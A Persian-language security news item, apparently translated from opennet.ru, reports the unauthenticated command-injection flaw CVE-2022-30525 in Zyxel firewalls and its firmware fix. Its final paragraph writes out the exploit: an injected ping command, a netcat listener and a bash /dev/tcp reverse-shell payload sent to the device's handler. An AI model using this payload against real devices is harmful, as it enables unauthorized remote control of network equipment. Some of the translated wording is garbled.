آسیب‌پذیری در فایروال‌های Zyxel که امکان اجرای کد بدون احراز هویت را فراهم می‌کند

یک آسیب‌پذیری حیاتی (CVE-2022-30525) در دستگاه‌های Zyxel سری ATP، VPN و USG FLEX شناسایی شده است که برای سازماندهی عملکرد فایروال‌ها، IDS و VPN در شرکت‌ها طراحی شده است، که به مهاجم خارجی اجازه می‌دهد تا کد را روی دستگاه اجرا کند. دستگاه بدون حقوق کاربر بدون احراز هویت برای انجام یک حمله، مهاجم باید بتواند با استفاده از پروتکل HTTP/HTTPS درخواست هایی را به دستگاه ارسال کند. Zyxel آسیب پذیری موجود در به روز رسانی سیستم عامل ZLD 5.30 را برطرف کرده است. طبق سرویس Shodan، در حال حاضر 16213 دستگاه بالقوه آسیب پذیر در شبکه جهانی وجود دارد که درخواست ها را از طریق HTTP/HTTPS می پذیرند.

عملیات با ارسال دستورات طراحی شده ویژه به وب کنترل کننده /ztp/cgi-bin/handler انجام می شود که بدون احراز هویت قابل دسترسی است. مشکل به دلیل عدم پاکسازی مناسب پارامترهای درخواست هنگام اجرای دستورات روی سیستم با استفاده از فراخوانی os.system که در کتابخانه lib_wan_settings.py استفاده می شود و هنگام پردازش عملیات setWanPortSt اجرا می شود، ایجاد می شود.

به عنوان مثال، یک مهاجم می تواند رشته “; پینگ 192.168.1.210;" که منجر به اجرای دستور “ping 192.168.1.210” بر روی سیستم خواهد شد. برای دسترسی به پوسته فرمان، می توانید "nc -lvnp 1270" را بر روی سیستم خود اجرا کنید و سپس با ارسال یک درخواست به دستگاه با علامت '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

منبع: opennet.ru

اضافه کردن نظر